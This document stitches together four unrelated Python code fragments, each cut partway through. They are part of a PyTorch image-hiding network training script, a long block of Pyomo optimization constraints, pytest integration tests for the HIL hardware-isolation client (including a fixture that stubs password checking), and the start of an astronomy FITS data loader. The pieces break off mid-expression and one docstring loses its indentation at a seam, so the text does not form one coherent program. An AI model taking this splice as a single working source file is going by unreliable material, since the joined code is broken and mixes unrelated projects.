            clean_rev_secret_img_A = Rnet(A_imgv)
            clean_rev_secret_img_B = Rnet(cover_imgv)
            # amplified container-vs-cover difference for visual inspection
            diff = 50 * (container_img - cover_imgv)
            with torch.no_grad():
                save_result_pic(cover_img_A, cover_img_B, container_img, diff, clean_rev_secret_img_A, clean_rev_secret_img_B, rev_secret_img, secret_img, 'test', i , testpicsDir)
    print("#################################################### test end ########################################################")
# Custom weights initialization called on the generator and discriminator nets.
def weights_init(m):
    """Initialise module weights for GAN training.

    Conv-like layers (any class whose name contains 'Conv') get weights drawn
    from N(0, 0.02); BatchNorm layers get weights from N(1, 0.02) with zero
    bias. Other module types are left untouched.
    """
    layer_type = m.__class__.__name__
    if 'Conv' in layer_type:
        m.weight.data.normal_(0.0, 0.02)
    elif 'BatchNorm' in layer_type:
        m.weight.data.normal_(1.0, 0.02)
        m.bias.data.fill_(0)
# Print the structure and total parameter count of a network.
def print_network(net):
    """Log the model architecture and its total number of parameters.

    :param net: any ``torch.nn.Module``; its ``repr`` and parameter count
        are written through ``print_log`` to the global ``logPath``.
    """
    # sum over all parameter tensors instead of a manual accumulation loop
    num_params = sum(param.numel() for param in net.parameters())
    print_log(str(net), logPath)
    print_log('Total number of parameters: %d' % num_params, logPath)
def save_current_codes(des_path):
    """Back up this script and its source sub-packages into *des_path*.

    Copies the running file itself, then mirrors the data/, models/ and
    utils/ directories next to it via ``shutil.copytree``.

    :param des_path: destination directory for the backup.
    """
    # Absolute path of the running script, split into directory + filename.
    main_file_path = os.path.realpath(__file__)
    cur_work_dir, mainfile = os.path.split(main_file_path)
    # Copy the entry-point script itself.
    shutil.copyfile(main_file_path, os.path.join(des_path, mainfile))
    # Mirror each source sub-package (copytree requires the target not exist).
    for sub in ("/data/", "/models/", "/utils/"):
        shutil.copytree(cur_work_dir + sub, des_path + sub)
def print_log(log_info, log_path, console=True):
    """Print *log_info* to the console and append it to the log file.

    :param log_info: the message to record (a single line, no newline).
    :param log_path: path of the log file to append to.
    :param console: when True also echo the message to stdout.
    """
    # print the info into the console
    if console:
        print(log_info)
    # debug mode: don't write the log into files
    if not opt.debug:
        # Mode 'a+' creates the file when it is missing and appends
        # otherwise, which collapses the original exists/not-exists branches.
        # Using a context manager also fixes the original bug where the
        # first write opened a file handle and never closed it.
        with open(log_path, 'a+') as f:
            f.writelines(log_info + '\n')
def save_result_pic(cover_img_A, cover_img_B, container_img, diff, clean_rev_secret_img_A, clean_rev_secret_img_B, rev_secret_img, secret_img, epoch, i, save_path):
    """Save a comparison grid of covers, container, diff and recovered marks.

    Each input tensor holds one batch; rows are stacked in the order
    cover A, cover B, container, diff, recovered-from-A, recovered-from-B,
    recovered watermark, original watermark, then written as one PNG.

    :param epoch: label used in the output file name.
    :param i: batch index used in the output file name.
    :param save_path: directory receiving the PNG.
    """
    this_batch_size = cover_img_A.size(0)
    frame_shape = (this_batch_size, 3, opt.imageSize, opt.imageSize)
    # `diff` already has the display layout; every other tensor is reshaped.
    rows = [t.reshape(*frame_shape) for t in (cover_img_A, cover_img_B, container_img)]
    rows.append(diff)
    rows += [t.reshape(*frame_shape)
             for t in (clean_rev_secret_img_A, clean_rev_secret_img_B,
                       rev_secret_img, secret_img)]
    showResult = torch.cat(rows, 0)
    resultImgName = '%s/ResultPics_epoch%s_batch%s.png' % (
        save_path, epoch, i)
    vutils.save_image(showResult, resultImgName,
                      nrow=this_batch_size, padding=1, normalize=False)
class AverageMeter(object):
"""
Computes and stores the average and current value.
"""
| |
m.x852 <= 1106.777870451)
m.c748 = Constraint(expr= 1106.777870451*m.b61 + m.x156 - m.x853 <= 1106.777870451)
m.c749 = Constraint(expr= 1106.777870451*m.b62 + m.x158 - m.x848 <= 1106.777870451)
m.c750 = Constraint(expr= 1106.777870451*m.b63 + m.x160 - m.x849 <= 1106.777870451)
m.c751 = Constraint(expr= 1106.777870451*m.b64 + m.x162 - m.x850 <= 1106.777870451)
m.c752 = Constraint(expr= 1106.777870451*m.b65 + m.x164 - m.x851 <= 1106.777870451)
m.c753 = Constraint(expr= 1106.777870451*m.b66 + m.x166 - m.x852 <= 1106.777870451)
m.c754 = Constraint(expr= 1106.777870451*m.b67 + m.x168 - m.x853 <= 1106.777870451)
m.c755 = Constraint(expr= 1106.777870452*m.b68 + m.x170 - m.x848 <= 1106.777870452)
m.c756 = Constraint(expr= 1106.777870452*m.b69 + m.x172 - m.x849 <= 1106.777870452)
m.c757 = Constraint(expr= 1106.777870452*m.b70 + m.x174 - m.x850 <= 1106.777870452)
m.c758 = Constraint(expr= 1106.777870452*m.b71 + m.x176 - m.x851 <= 1106.777870452)
m.c759 = Constraint(expr= 1106.777870452*m.b72 + m.x178 - m.x852 <= 1106.777870452)
m.c760 = Constraint(expr= 1106.777870452*m.b73 + m.x180 - m.x853 <= 1106.777870452)
m.c761 = Constraint(expr= m.b2 - m.b3 + m.x854 >= 0)
m.c762 = Constraint(expr= m.b3 - m.b4 + m.x855 >= 0)
m.c763 = Constraint(expr= m.b4 - m.b5 + m.x856 >= 0)
m.c764 = Constraint(expr= m.b5 - m.b6 + m.x857 >= 0)
m.c765 = Constraint(expr= m.b6 - m.b7 + m.x858 >= 0)
m.c766 = Constraint(expr= m.b8 - m.b9 + m.x859 >= 0)
m.c767 = Constraint(expr= m.b9 - m.b10 + m.x860 >= 0)
m.c768 = Constraint(expr= m.b10 - m.b11 + m.x861 >= 0)
m.c769 = Constraint(expr= m.b11 - m.b12 + m.x862 >= 0)
m.c770 = Constraint(expr= m.b12 - m.b13 + m.x863 >= 0)
m.c771 = Constraint(expr= m.b14 - m.b15 + m.x864 >= 0)
m.c772 = Constraint(expr= m.b15 - m.b16 + m.x865 >= 0)
m.c773 = Constraint(expr= m.b16 - m.b17 + m.x866 >= 0)
m.c774 = Constraint(expr= m.b17 - m.b18 + m.x867 >= 0)
m.c775 = Constraint(expr= m.b18 - m.b19 + m.x868 >= 0)
m.c776 = Constraint(expr= m.b20 - m.b21 + m.x869 >= 0)
m.c777 = Constraint(expr= m.b21 - m.b22 + m.x870 >= 0)
m.c778 = Constraint(expr= m.b22 - m.b23 + m.x871 >= 0)
m.c779 = Constraint(expr= m.b23 - m.b24 + m.x872 >= 0)
m.c780 = Constraint(expr= m.b24 - m.b25 + m.x873 >= 0)
m.c781 = Constraint(expr= m.b26 - m.b27 + m.x874 >= 0)
m.c782 = Constraint(expr= m.b27 - m.b28 + m.x875 >= 0)
m.c783 = Constraint(expr= m.b28 - m.b29 + m.x876 >= 0)
m.c784 = Constraint(expr= m.b29 - m.b30 + m.x877 >= 0)
m.c785 = Constraint(expr= m.b30 - m.b31 + m.x878 >= 0)
m.c786 = Constraint(expr= m.b32 - m.b33 + m.x879 >= 0)
m.c787 = Constraint(expr= m.b33 - m.b34 + m.x880 >= 0)
m.c788 = Constraint(expr= m.b34 - m.b35 + m.x881 >= 0)
m.c789 = Constraint(expr= m.b35 - m.b36 + m.x882 >= 0)
m.c790 = Constraint(expr= m.b36 - m.b37 + m.x883 >= 0)
m.c791 = Constraint(expr= m.b38 - m.b39 + m.x884 >= 0)
m.c792 = Constraint(expr= m.b39 - m.b40 + m.x885 >= 0)
m.c793 = Constraint(expr= m.b40 - m.b41 + m.x886 >= 0)
m.c794 = Constraint(expr= m.b41 - m.b42 + m.x887 >= 0)
m.c795 = Constraint(expr= m.b42 - m.b43 + m.x888 >= 0)
m.c796 = Constraint(expr= m.b44 - m.b45 + m.x889 >= 0)
m.c797 = Constraint(expr= m.b45 - m.b46 + m.x890 >= 0)
m.c798 = Constraint(expr= m.b46 - m.b47 + m.x891 >= 0)
m.c799 = Constraint(expr= m.b47 - m.b48 + m.x892 >= 0)
m.c800 = Constraint(expr= m.b48 - m.b49 + m.x893 >= 0)
m.c801 = Constraint(expr= m.b50 - m.b51 + m.x894 >= 0)
m.c802 = Constraint(expr= m.b51 - m.b52 + m.x895 >= 0)
m.c803 = Constraint(expr= m.b52 - m.b53 + m.x896 >= 0)
m.c804 = Constraint(expr= m.b53 - m.b54 + m.x897 >= 0)
m.c805 = Constraint(expr= m.b54 - m.b55 + m.x898 >= 0)
m.c806 = Constraint(expr= m.b56 - m.b57 + m.x899 >= 0)
m.c807 = Constraint(expr= m.b57 - m.b58 + m.x900 >= 0)
m.c808 = Constraint(expr= m.b58 - m.b59 + m.x901 >= 0)
m.c809 = Constraint(expr= m.b59 - m.b60 + m.x902 >= 0)
m.c810 = Constraint(expr= m.b60 - m.b61 + m.x903 >= 0)
m.c811 = Constraint(expr= m.b62 - m.b63 + m.x904 >= 0)
m.c812 = Constraint(expr= m.b63 - m.b64 + m.x905 >= 0)
m.c813 = Constraint(expr= m.b64 - m.b65 + m.x906 >= 0)
m.c814 = Constraint(expr= m.b65 - m.b66 + m.x907 >= 0)
m.c815 = Constraint(expr= m.b66 - m.b67 + m.x908 >= 0)
m.c816 = Constraint(expr= m.b68 - m.b69 + m.x909 >= 0)
m.c817 = Constraint(expr= m.b69 - m.b70 + m.x910 >= 0)
m.c818 = Constraint(expr= m.b70 - m.b71 + m.x911 >= 0)
m.c819 = Constraint(expr= m.b71 - m.b72 + m.x912 >= 0)
m.c820 = Constraint(expr= m.b72 - m.b73 + m.x913 >= 0)
m.c821 = Constraint(expr= - m.b2 + m.b3 + m.x854 >= 0)
m.c822 = Constraint(expr= - m.b3 + m.b4 + m.x855 >= 0)
m.c823 = Constraint(expr= - m.b4 + m.b5 + m.x856 >= 0)
m.c824 = Constraint(expr= - m.b5 + m.b6 + m.x857 >= 0)
m.c825 = Constraint(expr= - m.b6 + m.b7 + m.x858 >= 0)
m.c826 = Constraint(expr= - m.b8 + m.b9 + m.x859 >= 0)
m.c827 = Constraint(expr= - m.b9 + m.b10 + m.x860 >= 0)
m.c828 = Constraint(expr= - m.b10 + m.b11 + m.x861 >= 0)
m.c829 = Constraint(expr= - m.b11 + m.b12 + m.x862 >= 0)
m.c830 = Constraint(expr= - m.b12 + m.b13 + m.x863 >= 0)
m.c831 = Constraint(expr= - m.b14 + m.b15 + m.x864 >= 0)
m.c832 = Constraint(expr= - m.b15 + m.b16 + m.x865 >= 0)
m.c833 = Constraint(expr= - m.b16 + m.b17 + m.x866 >= 0)
m.c834 = Constraint(expr= - m.b17 + m.b18 + m.x867 >= 0)
m.c835 = Constraint(expr= - m.b18 + m.b19 + m.x868 >= 0)
m.c836 = Constraint(expr= - m.b20 + m.b21 + m.x869 >= 0)
m.c837 = Constraint(expr= - m.b21 + m.b22 + m.x870 >= 0)
m.c838 = Constraint(expr= - m.b22 + m.b23 + m.x871 >= 0)
m.c839 = Constraint(expr= - m.b23 + m.b24 + m.x872 >= 0)
m.c840 = Constraint(expr= - m.b24 + m.b25 + m.x873 >= 0)
m.c841 = Constraint(expr= - m.b26 + m.b27 + m.x874 >= 0)
m.c842 = Constraint(expr= - m.b27 + m.b28 + m.x875 >= 0)
m.c843 = Constraint(expr= - m.b28 + m.b29 + m.x876 >= 0)
m.c844 = Constraint(expr= - m.b29 + m.b30 + m.x877 >= 0)
m.c845 = Constraint(expr= - m.b30 + m.b31 + m.x878 >= 0)
m.c846 = Constraint(expr= - m.b32 + m.b33 + m.x879 >= 0)
m.c847 = Constraint(expr= - m.b33 + m.b34 + m.x880 >= 0)
m.c848 = Constraint(expr= - m.b34 + m.b35 + m.x881 >= 0)
m.c849 = Constraint(expr= - m.b35 + m.b36 + m.x882 >= 0)
m.c850 = Constraint(expr= - m.b36 + m.b37 + m.x883 >= 0)
m.c851 = Constraint(expr= - m.b38 + m.b39 + m.x884 >= 0)
m.c852 = Constraint(expr= - m.b39 + m.b40 + m.x885 >= 0)
m.c853 = Constraint(expr= - m.b40 + m.b41 + m.x886 >= 0)
m.c854 = Constraint(expr= - m.b41 + m.b42 + m.x887 >= 0)
m.c855 = Constraint(expr= - m.b42 + m.b43 + m.x888 >= 0)
m.c856 = Constraint(expr= - m.b44 + m.b45 + m.x889 >= 0)
m.c857 = Constraint(expr= - m.b45 + m.b46 + m.x890 >= 0)
m.c858 = Constraint(expr= - m.b46 + m.b47 + m.x891 >= 0)
m.c859 = Constraint(expr= - m.b47 + m.b48 + m.x892 >= 0)
m.c860 = Constraint(expr= - m.b48 + m.b49 + m.x893 >= 0)
m.c861 = Constraint(expr= - m.b50 + m.b51 + m.x894 >= 0)
m.c862 = Constraint(expr= - m.b51 + m.b52 + m.x895 >= 0)
m.c863 = Constraint(expr= - m.b52 + m.b53 + m.x896 >= 0)
m.c864 = Constraint(expr= - m.b53 + m.b54 + m.x897 >= 0)
m.c865 = Constraint(expr= - m.b54 + m.b55 + m.x898 >= 0)
m.c866 = Constraint(expr= - m.b56 + m.b57 + m.x899 >= 0)
m.c867 = Constraint(expr= - m.b57 + m.b58 + m.x900 >= 0)
m.c868 = Constraint(expr= - m.b58 + m.b59 + m.x901 >= 0)
m.c869 = Constraint(expr= - m.b59 + m.b60 + m.x902 >= 0)
m.c870 = Constraint(expr= - m.b60 + m.b61 + m.x903 >= 0)
m.c871 = Constraint(expr= - m.b62 + m.b63 + m.x904 >= 0)
m.c872 = Constraint(expr= - m.b63 + m.b64 + m.x905 >= 0)
m.c873 = Constraint(expr= - m.b64 + m.b65 + m.x906 >= 0)
m.c874 = Constraint(expr= - m.b65 + m.b66 + m.x907 >= 0)
m.c875 = Constraint(expr= - m.b66 + m.b67 + m.x908 >= 0)
m.c876 = Constraint(expr= - m.b68 + m.b69 + m.x909 >= 0)
m.c877 = Constraint(expr= - m.b69 + m.b70 + m.x910 >= 0)
m.c878 = Constraint(expr= - m.b70 + m.b71 + m.x911 >= 0)
m.c879 = Constraint(expr= - m.b71 + m.b72 + m.x912 >= 0)
m.c880 = Constraint(expr= - m.b72 + m.b73 + m.x913 >= 0)
m.c881 = Constraint(expr= - 5*m.b74 + m.x226 <= 0)
m.c882 = Constraint(expr= - 5*m.b75 + m.x229 <= 0)
m.c883 = Constraint(expr= - 5*m.b76 | |
"""Integration tests for client library"""
from hil.flaskapp import app
from hil.client.base import ClientBase, FailedAPICallException
from hil.errors import BadArgumentError
from hil.client.client import Client
from hil.test_common import config_testsuite, config_merge, \
fresh_database, fail_on_log_warnings, server_init, uuid_pattern, \
obmd_cfg, HybridHTTPClient, initial_db
from hil.model import db
from hil import config, deferred
import json
import pytest
import requests
from passlib.hash import sha512_crypt
# Shared endpoint/credentials and a single client instance used by all tests.
ep = "http://127.0.0.1:8000"
username = "hil_user"
password = "<PASSWORD>"
http_client = HybridHTTPClient(endpoint=ep,
                               username=username,
                               password=password)
C = Client(ep, http_client)  # Initializing client library

# Wrap the helpers imported from hil.test_common as pytest fixtures for
# this module.
fail_on_log_warnings = pytest.fixture(fail_on_log_warnings)
fresh_database = pytest.fixture(fresh_database)
server_init = pytest.fixture(server_init)
obmd_cfg = pytest.fixture(obmd_cfg)
# Fix: the variable was misspelled `intial_db`. It still worked because
# pytest registers fixtures under the wrapped function's __name__
# ('initial_db'), but the module attribute name now matches too.
initial_db = pytest.fixture(initial_db)
@pytest.fixture
def dummy_verify():
    """Temporarily replace ``sha512_crypt.verify`` with a stub that always
    accepts.

    The database auth backend hashes passwords on every request, which is
    deliberately slow and dominates test runtime. Monkey-patching the verify
    function with a trivially-true stub keeps the User-related client tests
    fast. The original implementation is restored after the test runs.
    """
    # staticmethod is required: the attribute is assigned onto a class, and
    # a plain function would otherwise be wrapped as an (unbound) method.
    @staticmethod
    def _always_true(*args, **kwargs):
        """Stub verifier: accept any password."""
        return True

    original_verify = sha512_crypt.verify
    sha512_crypt.verify = _always_true
    yield  # the test body runs here
    sha512_crypt.verify = original_verify
@pytest.fixture
def configure():
    """Load the HIL test-suite configuration used by these tests."""
    config_testsuite()
    overrides = {
        'auth': {
            'require_authentication': 'False',
        },
        'extensions': {
            'hil.ext.switches.mock': '',
            'hil.ext.network_allocators.null': None,
            'hil.ext.network_allocators.vlan_pool': '',
        },
        'hil.ext.network_allocators.vlan_pool': {
            'vlans': '1001-1040',
        },
        'devel': {
            # Disable dry_run, so we can talk to obmd. Note: We register
            # several "real" switches in this module, but never actually
            # preform any "real" network operations on them, so a proper
            # switch setup is still not necessary.
            'dry_run': None,
        },
    }
    config_merge(overrides)
    config.load_extensions()
@pytest.fixture
def database_authentication():
    """Configure HIL to use the database authentication backend.

    Only the Test_user class relies on this fixture.
    """
    config_testsuite()
    overrides = {
        'auth': {
            'require_authentication': 'False',
        },
        'extensions': {
            'hil.ext.auth.null': None,
            'hil.ext.auth.database': '',
        },
    }
    config_merge(overrides)
    config.load_extensions()
@pytest.fixture()
def obmd_node(obmd_cfg):
    """Register a node with both obmd and HIL and return its name.

    Used by tests that exercise the obmd-related calls (power, console...).
    """
    obmd_uri = 'http://localhost' + obmd_cfg['ListenAddr'] + \
        '/node/obmd-node'
    # First register the node with obmd itself, using its mock driver.
    payload = json.dumps({
        'type': 'mock',
        'info': {
            "addr": "10.0.0.23",
            "NumWrites": 0,
        },
    })
    resp = requests.put(obmd_uri,
                        auth=('admin', obmd_cfg['AdminToken']),
                        data=payload)
    assert resp.ok, "Failed to register node with obmd."
    # ...then register the same node with HIL, pointing at the obmd entry.
    assert C.node.register(
        "obmd-node",
        obmd_uri,
        obmd_cfg['AdminToken'],
    ) is None
    return 'obmd-node'
@pytest.fixture
def initial_admin():
    """Seed the database with one admin user (used by Test_user tests)."""
    with app.app_context():
        from hil.ext.auth.database import User
        admin = User(username, password, is_admin=True)
        db.session.add(admin)
        db.session.commit()
class Test_ClientBase:
    """Tests client initialization and object_url creation."""

    def test_object_url(self):
        """object_url should join its segments onto the v0 API root."""
        client = ClientBase(ep, 'some_base64_string')
        url = client.object_url('abc', '123', 'xy23z')
        assert url == 'http://127.0.0.1:8000/v0/abc/123/xy23z'
@pytest.mark.usefixtures('fail_on_log_warnings', 'configure', 'fresh_database',
                         'server_init', 'initial_db')
class Test_node:
    """ Tests Node related client calls. """
    # All methods go through the module-level client `C`; node/network names
    # ('free_node_0', 'manhattan_pxe', ...) come from the initial_db fixture.

    def test_list_nodes_free(self):
        """(successful) to list_nodes('free')"""
        assert C.node.list('free') == [
            u'free_node_0', u'free_node_1', u'no_nic_node'
        ]

    def test_list_nodes_all(self):
        """(successful) to list_nodes('all')"""
        assert C.node.list('all') == [
            u'free_node_0', u'free_node_1', u'manhattan_node_0',
            u'manhattan_node_1', u'no_nic_node', u'runway_node_0',
            u'runway_node_1'
        ]

    def test_node_register(self):
        """Test node_register"""
        assert C.node.register("dummy-node-01",
                               "http://obmd.example.com/node/dummy-node-01",
                               "secret",
                               ) is None

    def test_show_node(self):
        """(successful) to show_node"""
        assert C.node.show('free_node_0') == {
            u'metadata': {},
            u'project': None,
            u'nics': [
                {
                    u'macaddr': u'Unknown',
                    u'port': None,
                    u'switch': None,
                    u'networks': {}, u'label': u'boot-nic'
                },
                {
                    u'macaddr': u'Unknown',
                    u'port': u'free_node_0_port',
                    u'switch': u'stock_switch_0',
                    u'networks': {}, u'label': u'nic-with-port'
                }
            ],
            u'name': u'free_node_0'
        }

    def test_show_node_reserved_chars(self):
        """ test for catching illegal argument characters"""
        with pytest.raises(BadArgumentError):
            C.node.show('node-/%]07')

    def test_enable_disable_obm(self, obmd_node):
        """Test enable_obm/disable_obm"""
        # The spec says that these calls should silently no-op if the
        # state doesn't need to change so we call them repeatedly in
        # different orders to verify.
        C.node.disable_obm(obmd_node)
        C.node.enable_obm(obmd_node)
        C.node.enable_obm(obmd_node)
        C.node.disable_obm(obmd_node)
        C.node.disable_obm(obmd_node)
        C.node.disable_obm(obmd_node)
        C.node.enable_obm(obmd_node)

    def test_power_cycle(self, obmd_node):
        """(successful) to node_power_cycle"""
        C.node.enable_obm(obmd_node)
        assert C.node.power_cycle(obmd_node) is None

    def test_power_cycle_force(self, obmd_node):
        """(successful) to node_power_cycle(force=True)"""
        C.node.enable_obm(obmd_node)
        assert C.node.power_cycle(obmd_node, True) is None

    def test_power_cycle_no_force(self, obmd_node):
        """(successful) to node_power_cycle(force=False)"""
        C.node.enable_obm(obmd_node)
        assert C.node.power_cycle(obmd_node, False) is None

    def test_power_cycle_bad_arg(self, obmd_node):
        """error on call to power_cycle with bad argument."""
        C.node.enable_obm(obmd_node)
        with pytest.raises(FailedAPICallException):
            # force must be a boolean; a string is rejected server-side.
            C.node.power_cycle(obmd_node, 'wrong')

    def test_power_cycle_reserved_chars(self):
        """ test for catching illegal argument characters"""
        with pytest.raises(BadArgumentError):
            C.node.power_cycle('node-/%]07', False)

    def test_power_off(self, obmd_node):
        """(successful) to node_power_off"""
        C.node.enable_obm(obmd_node)
        assert C.node.power_off(obmd_node) is None

    def test_power_off_reserved_chars(self):
        """ test for catching illegal argument characters"""
        with pytest.raises(BadArgumentError):
            C.node.power_off('node-/%]07')

    def test_power_on(self, obmd_node):
        """(successful) to node_power_on"""
        C.node.enable_obm(obmd_node)
        assert C.node.power_on(obmd_node) is None

    def test_set_bootdev(self, obmd_node):
        """ (successful) to node_set_bootdev """
        C.node.enable_obm(obmd_node)
        assert C.node.set_bootdev(obmd_node, "A") is None

    def test_power_status(self, obmd_node):
        """(successful) to node_power_status"""
        C.node.enable_obm(obmd_node)
        resp = C.node.power_status(obmd_node)
        # "Mock Status" is what the obmd mock driver reports.
        assert resp["power_status"] == "Mock Status"

    def test_node_add_nic(self):
        """Test removing and then adding a nic."""
        C.node.remove_nic('free_node_1', 'boot-nic')
        assert C.node.add_nic('free_node_1', 'boot-nic', 'aa:bb:cc:dd:ee:ff') \
            is None

    def test_node_add_duplicate_nic(self):
        """Adding a nic twice should fail"""
        C.node.remove_nic('free_node_1', 'boot-nic')
        C.node.add_nic('free_node_1', 'boot-nic', 'aa:bb:cc:dd:ee:ff')
        with pytest.raises(FailedAPICallException):
            C.node.add_nic('free_node_1', 'boot-nic', 'aa:bb:cc:dd:ee:ff')

    def test_nosuch_node_add_nic(self):
        """Adding a nic to a non-existent node should fail."""
        with pytest.raises(FailedAPICallException):
            C.node.add_nic('abcd', 'eth0', 'aa:bb:cc:dd:ee:ff')

    def test_add_nic_reserved_chars(self):
        """ test for catching illegal argument characters"""
        with pytest.raises(BadArgumentError):
            C.node.add_nic('node-/%]08', 'eth0', 'aa:bb:cc:dd:ee:ff')

    def test_remove_nic(self):
        """(successful) call to node_remove_nic"""
        assert C.node.remove_nic('free_node_1', 'boot-nic') is None

    def test_remove_duplicate_nic(self):
        """Removing a nic twice should fail"""
        C.node.remove_nic('free_node_1', 'boot-nic')
        with pytest.raises(FailedAPICallException):
            C.node.remove_nic('free_node_1', 'boot-nic')

    def test_remove_nic_reserved_chars(self):
        """ test for catching illegal argument characters"""
        with pytest.raises(BadArgumentError):
            C.node.remove_nic('node-/%]08', 'boot-nic')

    def test_metadata_set(self):
        """ test for registering metadata from a node """
        assert C.node.metadata_set("free_node_0", "EK", "pk") is None

    def test_metadata_delete(self):
        """ test for deleting metadata from a node """
        # deleting from a nonexistent node must fail first...
        with pytest.raises(FailedAPICallException):
            C.node.metadata_delete("free_node", "EK")
        # ...then set + delete on a real node succeeds.
        C.node.metadata_set("free_node_0", "EK", "pk")
        assert C.node.metadata_delete("free_node_0", "EK") is None

    def test_node_show_console(self, obmd_node):
        """various calls to node_show_console"""
        # show console without enabling the obm.
        with pytest.raises(FailedAPICallException):
            C.node.show_console(obmd_node)
        C.node.enable_obm(obmd_node)
        # Read in a prefix of the output from the console; the obmd mock driver
        # keeps counting forever.
        console_stream = C.node.show_console(obmd_node)
        expected = '\n'.join([str(i) for i in range(10)])
        actual = ''
        while len(actual) < len(expected):
            # NOTE(review): `.next()` is the Python 2 iterator protocol;
            # under Python 3 this would need next(console_stream) — confirm
            # the intended interpreter version.
            actual += console_stream.next()
        assert actual.startswith(expected)
        C.node.disable_obm(obmd_node)
        with pytest.raises(FailedAPICallException):
            C.node.show_console(obmd_node)

    def test_node_show_console_reserved_chars(self):
        """test for cataching illegal argument characters"""
        with pytest.raises(BadArgumentError):
            C.node.show_console('node-/%]01')

    def test_node_connect_network(self):
        """(successful) call to node_connect_network"""
        response = C.node.connect_network(
            'manhattan_node_1', 'nic-with-port', 'manhattan_pxe',
            'vlan/native')
        # check that the reponse contains a valid UUID.
        assert uuid_pattern.match(response['status_id'])
        deferred.apply_networking()

    def test_node_connect_network_error(self):
        """Duplicate call to node_connect_network should fail."""
        C.node.connect_network(
            'manhattan_node_1', 'nic-with-port', 'manhattan_pxe',
            'vlan/native')
        deferred.apply_networking()
        with pytest.raises(FailedAPICallException):
            C.node.connect_network(
                'manhattan_node_1', 'nic-with-port', 'manhattan_pxe',
                'vlan/native')
        deferred.apply_networking()

    def test_node_connect_network_reserved_chars(self):
        """ test for catching illegal argument characters"""
        with pytest.raises(BadArgumentError):
            C.node.connect_network('node-/%]01', 'eth0', 'net-01',
                                   'vlan/native')

    def test_node_detach_network(self):
        """(successful) call to node_detach_network"""
        C.node.connect_network(
            'manhattan_node_0', 'nic-with-port', 'manhattan_pxe',
            'vlan/native')
        deferred.apply_networking()
        response = C.node.detach_network(
            'manhattan_node_0', 'nic-with-port', 'manhattan_pxe')
        assert uuid_pattern.match(response['status_id'])
        deferred.apply_networking()

    def test_node_detach_network_error(self):
        """Duplicate call to node_detach_network should fail."""
        C.node.connect_network(
            'manhattan_node_0', 'nic-with-port', 'manhattan_pxe',
            'vlan/native')
        deferred.apply_networking()
        C.node.detach_network(
            'manhattan_node_0', 'nic-with-port', 'manhattan_pxe')
        deferred.apply_networking()
        with pytest.raises(FailedAPICallException):
            C.node.detach_network(
                'manhattan_node_0', 'nic-with-port', 'manhattan_pxe')

    def test_node_detach_network_reserved_chars(self):
        """ test for catching illegal argument characters"""
        with pytest.raises(BadArgumentError):
            C.node.detach_network('node-/%]04', 'eth0', 'net-04')
@pytest.mark.usefixtures('fail_on_log_warnings', 'configure', 'fresh_database',
'server_init', 'initial_db')
class Test_project:
""" Tests project related client calls."""
def test_list_projects(self):
""" test for getting list of project """
assert C.project.list() == [u'empty-project', u'manhattan', u'runway']
def test_list_nodes_inproject(self):
""" test for getting list of nodes connected to a project. """
assert C.project.nodes_in('manhattan') == [
u'manhattan_node_0', u'manhattan_node_1']
assert C.project.nodes_in('runway') == [
u'runway_node_0', u'runway_node_1']
def test_list_nodes_inproject_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.project.nodes_in('pr/%[oj-01')
def test_list_networks_inproject(self):
""" test for getting list of networks connected to a project. """
assert C.project.networks_in('runway') == [
u'runway_provider', u'runway_pxe']
def test_list_networks_inproject_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.project.networks_in('pr/%[oj-01')
def test_project_create(self):
""" test for creating project. """
assert C.project.create('dummy-01') is None
def test_duplicate_project_create(self):
""" test for catching duplicate name while creating new project. """
C.project.create('dummy-02')
with pytest.raises(FailedAPICallException):
C.project.create('dummy-02')
def test_project_create_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.project.create('dummy/%[-02')
def test_project_delete(self):
""" test for deleting project. """
C.project.create('dummy-03')
assert C.project.delete('dummy-03') is None
def test_error_project_delete(self):
""" test to capture error condition in project delete. """
with pytest.raises(FailedAPICallException):
C.project.delete('dummy-03')
def test_project_delete_reserved_chars(self):
""" test for catching illegal argument characters"""
with pytest.raises(BadArgumentError):
C.project.delete('dummy/%[-03')
def test_project_connect_detach_node(self):
""" test for connecting/detaching node to project. """
C.project.create('proj-04')
assert C.project.connect('proj-04', 'free_node_0') is None
# connecting it again should fail
with pytest.raises(FailedAPICallException):
C.project.connect('proj-04', 'free_node_0')
assert C.project.detach('proj-04', 'free_node_0') is None
def test_project_connect_node_nosuchobject(self):
""" test | |
<filename>MUTANTS/ERIK.py
# -*- coding: utf-8 -*-
# filE ReadIng and Kleaning [Magneto]
import json
import os
import typing
import subprocess
import uuid
from shutil import copyfile
from datetime import datetime
import numpy as np
from astropy.io import fits
from RAVEN import standardize_single_dataset, convert_bytes
def loadfiles(input_path: str = "/Volumes/Elements/Outputs/Input_20211213T154548_HjCktf.fits",
              labels_path: str = "/Volumes/Elements/Outputs/Label_20211213T154548_HjCktf.fits",
              method_standardize_spectra=2,
              method_standardize_magnitudes=4,
              method_standardize_label_sfh=3,
              method_standardize_label_z=3,
              verbose=1) -> typing.Tuple[np.array, np.array, np.array, np.array, np.array, np.array, np.array]:
    """Load the input/label dataset from FITS files and standardize it.

    :param input_path: FITS file holding spectra + magnitudes per object.
    :param labels_path: FITS file holding SFH + metallicity labels.
    :param method_standardize_spectra: standardization mode for spectra.
    :param method_standardize_magnitudes: standardization mode for magnitudes.
    :param method_standardize_label_sfh: standardization mode for SFH labels.
    :param method_standardize_label_z: standardization mode for Z labels.
    :param verbose: > 0 prints the size of every returned array.
    :return: (input_spectra, input_magnitudes, label_sfh, label_z,
        spectra_lambda, agevec, ageweights)
    """
    # ToDo: argparse these variables
    # Make sure both files hold single-precision (-32) data before loading.
    verify32bits(input_path)
    verify32bits(labels_path)
    print("[INFO] Loading inputs...")
    input_data, input_header = open_fits_file(input_path)
    print("[INFO] Loading label...")
    label_data, label_header = open_fits_file(labels_path)
    print("[INFO] Input Data shape:", input_data.shape)
    n_spectra = input_header["nspectra"]
    n_ages = label_header["nagevec"]
    # Column 0 stores the axes (wavelength / age); the remaining columns
    # store one object each, so transpose to get objects-as-rows.
    spectra_lambda = input_data[1:n_spectra + 1, 0]
    agevec = label_data[1:n_ages + 1, 0]
    input_spectra = input_data[1:n_spectra + 1, 1:].transpose()
    input_magnitudes = input_data[n_spectra + 1:, 1:].transpose()
    label_sfh = label_data[1:n_ages + 1, 1:].transpose()
    label_z = label_data[n_ages + 1:, 1:].transpose()
